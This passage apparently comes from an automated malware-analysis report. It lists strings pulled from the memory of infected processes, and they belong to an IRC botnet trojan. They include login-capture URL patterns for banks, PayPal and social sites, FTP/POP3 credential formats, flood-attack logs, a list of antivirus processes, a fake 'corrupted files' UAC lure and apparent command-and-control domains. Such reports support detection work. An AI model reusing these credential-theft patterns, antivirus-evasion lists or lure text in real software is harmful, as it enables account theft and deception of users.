2.0.50726)</pre><pre>SbieDll.dll</pre><pre>Software\Classes\CLSID\%s\X</pre><pre>Software\Classes\CLSID\%s\X\%s</pre><pre>0xX</pre><pre>SB:0xX</pre><pre>G:%s_0xX_%c:%s_v1$</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u</pre><pre>IEXPLORE.EXE</pre><pre>IE.HTTP</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice</pre><pre>IE.HTTPS</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice</pre><pre>IE.AssocFile.HTM</pre><pre>HTTP\shell\open\command</pre><pre>Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s</pre><pre>Psapi.dll</pre><pre>%s\%s</pre><pre>Software\Adobe\Acrobat Reader\%s\Privileged</pre><pre>mscoree.dll</pre><pre>HARDWARE\DESCRIPTION\System\CentralProcessor\%u</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion</pre><pre>nspr4.dll</pre><pre>nss3.dll</pre><pre>Urlmon.dll</pre><pre>URLDownloadToFileW</pre><pre>Netapi32.dll</pre><pre>76487-640-1457236-23837</pre><pre>76487-337-8429955-22614</pre><pre>76487-644-3177037-23510</pre><pre>76497-640-6308873-23835</pre><pre>55274-640-2673064-23950</pre><pre>76487-640-8834005-23195</pre><pre>76487-640-0716662-23535</pre><pre>76487-644-8648466-23106</pre><pre>00426-293-8170032-85146</pre><pre>76487-341-5883812-22420</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup</pre><pre>{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}</pre><pre>snxhk.dll</pre><pre>comctl32.dll</pre><pre>ZwSetValueKey</pre><pre>ZwDeleteValueKey</pre><pre>SOFTWARE\%s</pre><pre>update.microsoft.com</pre><pre>microsoft.com</pre><pre>windowsupdate.microsoft.com</pre><pre>JOIN</pre><pre>PRIVMSG</pre><pre>.rdata</pre><pre>cmd_option.%s</pre><pre>/c 
%s</pre><pre>cmd.exe</pre><pre>msvcrt.dll</pre><pre>--x-x-x-xx</pre><pre>Content-Type: multipart/form-data; boundary=x-x-x-xx</pre><pre>Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"</pre><pre>%s?action=up&g=%s</pre><pre>xul.dll</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>?pid=%d</pre><pre>?page=%d</pre><pre>?id=%u</pre><pre>%s=%u&%s=%s</pre><pre>%s=%s&%s=%u</pre><pre>&%s=%s</pre><pre>&%s%u=</pre><pre>&%s%hu=</pre><pre>&%s=_%u</pre><pre>%d|%s|%s|%s</pre><pre>.info</pre><pre>httpget</pre><pre>GET /%s HTTP/1.1</pre><pre>Host: %s</pre><pre>Content-Length: %d</pre><pre>Accept: %s</pre><pre>Accept-Language: %s</pre><pre>Accept-Charset: %s</pre><pre>Accept-Encoding: %s</pre><pre>User-Agent: %s</pre><pre>Referer: %s</pre><pre>Connection: %s</pre><pre>http://</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>tbb-firefox.exe</pre><pre>%s:%hu</pre><pre>windowsupdate</pre><pre>SSH2_MSG_KEXINIT</pre><pre>SSH2_MSG_DISCONNECT</pre><pre>SSH2_MSG_USERAUTH_SUCCESS</pre><pre>http://%s%s/image.php?id=%s</pre><pre>TaskDialogIndirect</pre><pre>http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535</pre><pre>ÐxX</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>secur32.dll</pre><pre>crypt32.dll</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>wininet.dll</pre><pre>shell32.dll</pre><pre>shlwapi.dll</pre><pre>ole32.dll</pre><pre>version.dll</pre><pre>sfc.dll</pre><pre>dnsapi.dll</pre><pre>ws2_32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>8"808]9|9</pre><pre>9%9 919<9</pre><pre>=(=/=6==={=</pre><pre>4 
4?4^4}4</pre><pre>6o6g6r6w6</pre><pre>9 9$9(90949</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>This pointer, %d, is aligned on %d</pre><pre>This pointer, %d, is not aligned on %d</pre><pre>%f, %f and %f form a right-angled triangle.</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>?#%X.y</pre><pre>%S#[k</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>GetWindowsDirectoryA</pre><pre>CreatePipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>.VI3xqr</pre><pre>zcÁ</pre><pre>Udp?iw0</pre><pre>/#"%f</pre><pre>P.oUw</pre><pre>B%Su[</pre><pre>Rkka.by</pre><pre>.dYi'</pre><pre>p.Cvq</pre><pre>.EU{%</pre><pre>D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. 
-.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre
><b>notepad.exe_1520_rwx_000A0000_00029000:</b>
<b>notepad.exe_1520_rwx_008B0000_00027000:</b>
<b>notepad.exe_1520_rwx_008D8000_00072000:</b><pre>Multiple corrupted files have been found in the folder 'My Documents'. 
To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. 
This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already 
registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows 
Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize 
called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. 
%s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre><b>notepad.exe_1520_rwx_00950000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL 
'%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sess
ions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d 
KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" 
s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\notepad.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\notepad.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>jqs.exe_348_rwx_010C0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG 
t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN 